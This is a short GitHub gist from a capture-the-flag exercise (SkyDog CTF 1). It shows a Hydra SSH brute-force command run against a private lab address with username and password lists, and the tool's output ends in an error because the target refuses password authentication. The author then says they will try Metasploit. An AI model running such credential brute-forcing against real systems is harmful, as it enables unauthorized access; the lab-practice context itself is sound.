Skip to content

Instantly share code, notes, and snippets.

@awesomeaakash
Created August 20, 2017 05:09
Show Gist options
  • Save awesomeaakash/3d698660bc6bef3d565dc880d70dde2a to your computer and use it in GitHub Desktop.
Save awesomeaakash/3d698660bc6bef3d565dc880d70dde2a to your computer and use it in GitHub Desktop.
hydra ssh bruteforce skydog ctf 1
hydra -t 5 -V -f -L usernames.txt -P passwords.txt ssh://192.168.56.131:22
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-19 00:31:59
[DATA] max 5 tasks per 1 server, overall 64 tasks, 812 login tries (l:29/p:28), ~2 tries per task
[DATA] attacking service ssh on port 22
[ERROR] target ssh://192.168.56.131:22/ does not support password authentication.
When i used it then i saw error. I also googled it but failed. So now lets see msfconsole
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment